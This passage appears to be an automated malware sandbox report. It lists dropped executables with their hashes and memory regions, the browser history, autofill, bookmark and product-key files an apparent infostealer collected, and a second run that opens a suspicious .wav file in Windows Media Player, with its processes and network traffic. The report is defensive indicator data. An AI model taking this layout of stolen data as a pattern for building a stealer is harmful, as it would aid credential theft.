memory/1012-978-0x0000000006D00000-0x0000000006D4C000-memory.dmp

C:\Users\Admin\AppData\Roaming\xw.exe

MD5 9b5571670ab852ab22ef3810cfd70159
SHA1 8c7972a29379b57f9e40d8b7af796eb938cf8670
SHA256 6e1a3a18373c5b55d3dd1e75c210bb15ede6de748c3b88af5858120144558ab1
SHA512 01e593ae4febe272b7f3fc303ba130797e1d36335716627ebd667d8c347302ca17d252f2cda37a6cb15906c12ba8c103e480b8a2ce97290a81cea500bb66a092

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\xw.exe.log

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

memory/1012-985-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3080-987-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3080-986-0x0000000000400000-0x0000000000C0A000-memory.dmp

memory/3080-988-0x0000000005610000-0x00000000056A2000-memory.dmp

memory/3080-990-0x00000000055C0000-0x00000000055CA000-memory.dmp

memory/3080-989-0x0000000005790000-0x00000000057A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 f37938f3bb58f159e1d46403c6e0b10a
SHA1 78948994aa6c388b4356ee1eeb94b20cdfcda845
SHA256 634a0173ea818d5b152fcfbd8cc4b5d05fb381dac744b251a7b0184b2d7ddac8
SHA512 6345f8f659fbcd16bb9f42cb68270f9ab275a76ba0acc74cb55a1d6c1bfade06c0cf1d2fbd6b671cb0445869714a19bb8d08ac71ca57fdd21a941fe0b28773a5

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 a90e4f6bdd44a71e2246160693884539
SHA1 940ebec474e0b4d87dc4f06f37a1d32d2315cf56
SHA256 b2c5ecae8bdeb480fb306372d7a12d943531bd0de1b15f45168ba659f25694d4
SHA512 9a7fcd588ef5842798481bacfb7b32dd57efe06db3c852c69916d0045f806894d475ccf8f52bed942a35f4160bb6c3be7d635b17928d29148318c2858b62d937

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 d1aa9832a89fcef4fe32df07d43736c0
SHA1 75b1fd07a8a8935cfa8ab8fa816aebddbeefd1c5
SHA256 c82c8c416aec3df58bab4ec5b133a7a7ce2a64766c3ba7eab9d33e86be58a4ce
SHA512 bca7f2a3f5d4316cc96d73887ba350cc44fda87eaf609c535cf2eb91cc62bc04003303034bead8f759b531bc3b565d515d731584d64282d273a81c56ec1a9a84

memory/3144-1020-0x0000000000BD0000-0x0000000000D62000-memory.dmp

memory/3732-1021-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp

memory/3080-1022-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3144-1023-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3732-1024-0x000001B3F36C0000-0x000001B3F36D0000-memory.dmp

memory/3732-1019-0x000001B3D8E70000-0x000001B3D8FE8000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\build.exe

MD5 ce008446a6fa668f1482d5dbf86db7a5
SHA1 e44d92971edbeb71bfd53e38b2d5dd31fe0dc216
SHA256 b8cf553f561a7594907f7407c23d79b21c175472f56a5bc55a377c6f3c908d4d
SHA512 980c5a16696eabe5f1c660750be914cd2df4e72111a416ad1d53efd8cb29852b64d5ffdb4e5286543aaa3b76ba599243f768c6338f23af0163dea9107e4cdd6d

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 dd87528a716d48530d8cc7fe6bec3386
SHA1 89351d5b60846912f216acb58219397fc1ca9aee
SHA256 eb2b5d61c9a6d7e26f81da14df0c063fb2c71ba294389fce6076a0ae52356244
SHA512 9f203bbb162250aab7cd643ac72f430ddd761c063d5a2fd6fd03cdf7707a6e6c287bfeba4b675d4173c92641573313d5f765afefa0c3d159e196542b10d6b861

C:\Users\Admin\AppData\Local\Temp\loaderX.exe

MD5 45ea343e335d2d6400ccbc1e3fc85f11
SHA1 7f2267d1f27a076e284696c30a4cf4768fd1a52f
SHA256 f38fbc005bcaadb661f8f57f00eb44960e27a1cbf4c4012c3f27834e62a9c203
SHA512 c7689143605327ed63d967b81e7eb8eecf786b5273d772209d7581fc36517953b686a4c8196f9100acf026e9e8c5edc7724e5f0f77d0c982377dfd5d039e33a1

memory/3732-1026-0x000001B3F3950000-0x000001B3F39A0000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Data\Histories.txt

MD5 412ec159e4b14be1ca93db473e80acc2
SHA1 8909b6f7fc8715a749270b6ceb8f05f823f59fd3
SHA256 eaff9c24df526e9c884832130bf6de9182fd96f3dcdba33e8e5e7a4ed37f1bbe
SHA512 a90524333fd34d44f5784a90ada19904ea7379de26cae08ffdfd2ee25b3fd5b36c2cbcf7a7e6fc4ff734680ca1ff177ed42df1d4f5583d6a1a89d622c183f0b4

C:\Users\Admin\AppData\Local\Temp\Data\Autofills.txt

MD5 6be6fdca0cfa94635b8689b2b0bf2bee
SHA1 379c61029b5443c3d3df7c770423e40618b36d15
SHA256 5bc3a7ced261f235f4a30797ad96f803c9e022a95ad6bc7fedc06d0fd2a0abeb
SHA512 7955fb48977c971563b10420e379ebea01e42582a8dfe2719ec756dda7e757168031a58a3c9fef061c0abb6c799579f7c8b46de4fc5b4ab3519d735092848cd8

memory/3144-1059-0x00000000055A0000-0x00000000055B0000-memory.dmp

memory/3732-1068-0x00007FF9A8820000-0x00007FF9A92E1000-memory.dmp

memory/3144-1071-0x0000000005E40000-0x0000000005ED2000-memory.dmp

memory/3144-1073-0x0000000005F00000-0x0000000005F08000-memory.dmp

memory/3144-1072-0x0000000005ED0000-0x0000000005EF6000-memory.dmp

memory/3144-1075-0x0000000006E90000-0x0000000006E98000-memory.dmp

memory/3144-1076-0x0000000006EB0000-0x0000000006ECE000-memory.dmp

memory/3144-1074-0x0000000006E80000-0x0000000006E8A000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Browsers\Firefox\Bookmarks.txt

MD5 2e9d094dda5cdc3ce6519f75943a4ff4
SHA1 5d989b4ac8b699781681fe75ed9ef98191a5096c
SHA256 c84c98bbf5e0ef9c8d0708b5d60c5bb656b7d6be5135d7f7a8d25557e08cf142
SHA512 d1f7eed00959e902bdb2125b91721460d3ff99f3bdfc1f2a343d4f58e8d4e5e5a06c0c6cdc0379211c94510f7c00d7a8b34fa7d0ca0c3d54cbbe878f1e9812b7

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Process.txt

MD5 d162920ec27ea267235b5216d6701181
SHA1 ef91540d216bead782f55da51239c2682dc7b71d
SHA256 c3f4acbecdd4feb212db3fac658cb531876ae23929b76cb49d35285409a224fd
SHA512 7e671cbc520856770e202e379979db04665b69c770ee984c36f5f2e5bb7a5c110400f7db99164f50c88762f141a104e769493b8765a9148108f750a0ba1567a4

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Apps.txt

MD5 b1d58554f33c991f9454f81bf1f6a7a6
SHA1 1a9c0748fbb4c4974315f6a3188ffb5078372de1
SHA256 2809730601ec3cd803e75dded9788afc2683f6562378a497e7300fd83137838c
SHA512 ef961a73b2b8844155d1684a6d5e0319ad5d0c8cb2c60e4ed16b03cca69e04bf9872f2bff8fdf24d3bf284366f2b2f0d36f1e4c1cd5d007732c3ad0af562d5c6

memory/3144-1260-0x00000000055A0000-0x00000000055B0000-memory.dmp

memory/3144-1263-0x0000000006FE0000-0x000000000705A000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\OneDrive.txt

MD5 966247eb3ee749e21597d73c4176bd52
SHA1 1e9e63c2872cef8f015d4b888eb9f81b00a35c79
SHA256 8ddfc481b1b6ae30815ecce8a73755862f24b3bb7fdebdbf099e037d53eb082e
SHA512 bd30aec68c070e86e3dec787ed26dd3d6b7d33d83e43cb2d50f9e2cff779fee4c96afbbe170443bd62874073a844beb29a69b10c72c54d7d444a8d86cfd7b5aa

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\Directories\Videos.txt

MD5 1fddbf1169b6c75898b86e7e24bc7c1f
SHA1 d2091060cb5191ff70eb99c0088c182e80c20f8c
SHA256 a67aa329b7d878de61671e18cd2f4b011d11cbac67ea779818c6dafad2d70733
SHA512 20bfeafde7fec1753fef59de467bd4a3dd7fe627e8c44e95fe62b065a5768c4508e886ec5d898e911a28cf6365f455c9ab1ebe2386d17a76f53037f99061fd4d

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\Debug.txt

MD5 894a0706eaf89a7b68175d7da206a8b3
SHA1 50cb6c62493034303e4d35aef1e0c45d5dd2e102
SHA256 ce03ca4421eaf1c1b578af11d74efd3d5d4198860e209ae4929f722cf2601f18
SHA512 1a06886bea0f2700b1a6d0d64f3d2cadf8b49ec1300b93dde40d50da2e563f9ec3ea4df446faf6462b95b375dc35a9ac8f71816eb06c96a9b7fea91817667924

memory/3144-1335-0x0000000007260000-0x0000000007312000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\Admin@EUCQOBEO_en-US\System\ProductKey.txt

MD5 71eb5479298c7afc6d126fa04d2a9bde
SHA1 a9b3d5505cf9f84bb6c2be2acece53cb40075113
SHA256 f6cadfd4e4c25ff3b8cffe54a2af24a757a349abbf4e1142ec4c9789347fe8b3
SHA512 7c6687e21d31ec1d6d2eff04b07b465f875fd80df26677f1506b14158444cf55044eb6674880bd5bd44f04ff73023b26cb19b8837427a1d6655c96df52f140bd

memory/3144-1337-0x0000000008630000-0x0000000008984000-memory.dmp

C:\Users\Admin\AppData\Local\4328422ae596810d79d5ca8d46a9b287\msgid.dat

MD5 0195e3cc8225740a42592efa8bf12f60
SHA1 d4317e1f9762572ea061de3e2639f74cd2a941be
SHA256 0aeb189d6afa7545e36f66de5c3bd66f6ee12742d77168605c78588e9eebb1db
SHA512 8681594da21e812625a02322f0996f140b28f8554ae04cf9eb79723fb2c114e6bf8b4a1c42616254dfd709d3faf15924d344bfec840dd8121e9873d7f6e45173

memory/3144-1349-0x00000000714D0000-0x0000000071C80000-memory.dmp

memory/3144-1350-0x00000000055A0000-0x00000000055B0000-memory.dmp

memory/3144-1351-0x00000000055A0000-0x00000000055B0000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-01-19 20:19

Reported

2024-01-19 20:23

Platform

win10v2004-20231222-en

Max time kernel

0s

Max time network

129s

Command Line

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"

Signatures

Processes

C:\Program Files (x86)\Windows Media Player\wmplayer.exe

"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"

C:\Windows\SysWOW64\unregmp2.exe

"C:\Windows\System32\unregmp2.exe" /AsyncFirstLogon

C:\Windows\system32\unregmp2.exe

"C:\Windows\SysNative\unregmp2.exe" /AsyncFirstLogon /REENTRANT

C:\Program Files (x86)\Windows Media Player\setup_wm.exe

"C:\Program Files (x86)\Windows Media Player\setup_wm.exe" /RunOnce:"C:\Program Files (x86)\Windows Media Player\wmplayer.exe" /Open "C:\Users\Admin\AppData\Local\Temp\magic.poisontoolz.com\Otcck.wav"

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 wmploc.dll udp
US 8.8.8.8:53 73.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 41.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 241.154.82.20.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 183.142.211.20.in-addr.arpa udp
US 8.8.8.8:53 183.1.37.23.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 23.160.77.104.in-addr.arpa udp
US 8.8.8.8:53 83.179.17.96.in-addr.arpa udp
US 8.8.8.8:53 61.179.17.96.in-addr.arpa udp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp
US 204.79.197.200:443 tcp

Files

C:\Users\Admin\AppData\Local\Temp\wmsetup.log

MD5 dbbe3b2e56558f128653635d80156427
SHA1 692dcec13ab48af5614982611af2cc048a30035f
SHA256 62ea3456f7158f1d8fa340cdcb9e7cf18f4763c66829c0aba175f6cd873e8961
SHA512 e47e76b71849f45a54b172762dcd023d6bdf03d37e3c22f33424a986863a24741352a7f021ea974cd42f15424ec6cf64dc436c16ea11f6572407bc09541c5a08

C:\Users\Admin\AppData\Local\Microsoft\Windows Media\12.0\WMSDKNS.XML.bak

MD5 7050d5ae8acfbe560fa11073fef8185d
SHA1 5bc38e77ff06785fe0aec5a345c4ccd15752560e
SHA256 cb87767c4a384c24e4a0f88455f59101b1ae7b4fb8de8a5adb4136c5f7ee545b
SHA512 a7a295ac8921bb3dde58d4bcde9372ed59def61d4b7699057274960fa8c1d1a1daff834a93f7a0698e9e5c16db43af05e9fd2d6d7c9232f7d26ffcff5fc5900b

C:\Users\Admin\AppData\Local\Microsoft\Media Player\CurrentDatabase_400.wmdb

MD5 4ff06a33c8a7f9b17468a95e88f690c7
SHA1 917f7d8e8f6ac2603a2a1b5959f44b86e7b36ebb
SHA256 615904af68bd931ffad42d2868520dfc1e5e09889bb653c272531d154dc7f6a0
SHA512 05aff23b62a15e2efeb9f3a75301204252e766a4a8c8104f9fda086ee47e62f5e5bb7cc9595ba62721ef172250a11be16da67f4bd68a034d75ffb2dfbb061004

memory/1520-33-0x0000021DB49A0000-0x0000021DB49B0000-memory.dmp

memory/1520-65-0x0000021DBCE10000-0x0000021DBCE11000-memory.dmp

memory/1520-67-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp

memory/1520-69-0x0000021DBCF50000-0x0000021DBCF51000-memory.dmp

memory/1520-68-0x0000021DBCE40000-0x0000021DBCE41000-memory.dmp

memory/1520-49-0x0000021DB4AA0000-0x0000021DB4AB0000-memory.dmp